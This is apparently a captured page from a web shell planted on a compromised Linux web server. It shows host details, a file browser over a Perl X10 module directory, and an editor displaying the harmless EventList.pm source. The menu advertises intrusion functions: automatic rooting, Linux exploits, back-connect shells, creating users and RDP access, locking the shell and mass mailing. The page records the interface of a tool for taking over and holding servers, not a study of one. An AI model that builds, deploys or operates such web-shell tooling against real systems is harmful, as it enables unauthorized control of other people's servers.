Linux web0273.sh.tyo1 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64
Apache
: 127.0.0.1 | : 216.73.216.133
Cant Read [ /etc/named.conf ]
8.3.31
r2745769
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
X10 /
[ HOME SHELL ]
Name
Size
Permission
Action
ActiveHome.pm
8.8
KB
-rw-r--r--
Controller.pm
6.84
KB
-rw-r--r--
Device.pm
1.04
KB
-rw-r--r--
Event.pm
2.89
KB
-rw-r--r--
EventList.pm
1.06
KB
-rw-r--r--
FireCracker.pm
4.16
KB
-rw-r--r--
Macro.pm
1
KB
-rw-r--r--
MacroProc.pm
2.25
KB
-rw-r--r--
Network.pm
2.11
KB
-rw-r--r--
SchedEvent.pm
3.62
KB
-rw-r--r--
Scheduler.pm
2.1
KB
-rw-r--r--
Server.pm
3.75
KB
-rw-r--r--
TwoWay.pm
2.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EventList.pm
# Copyright (c) 1999-2017 Rob Fugina <robf@fugina.com> # Distributed under the terms of the GNU Public License, Version 3.0 package X10::EventList; use vars qw(@ISA); use Storable; @ISA = qw(Storable); use strict; sub new { my $type = shift; my $self = bless { list => [] }, $type; foreach (@_) { if (ref $_ eq 'X10::Event') { push @{$self->{list}}, $_; } elsif (ref $_ eq 'X10::EventList') { push @{$self->{list}}, $_->list; } elsif (ref $_ eq '') { push @{$self->{list}}, new X10::Event($_); } else { warn "Can't deal with a ", ref $_; } } @{$self->{list}} = grep { $_ } @{$self->{list}}; return undef unless @{$self->{list}}; return $self; } sub as_string { my $self = shift; join(', ', map { $_->as_string } @{$self->{list}}); } sub list { my $self = shift; @{$self->{list}}; } ### # build a string of words that implement this event sub compile { my $self = shift; map { $_->compile } @{$self->{list}}; } ### 1;
Close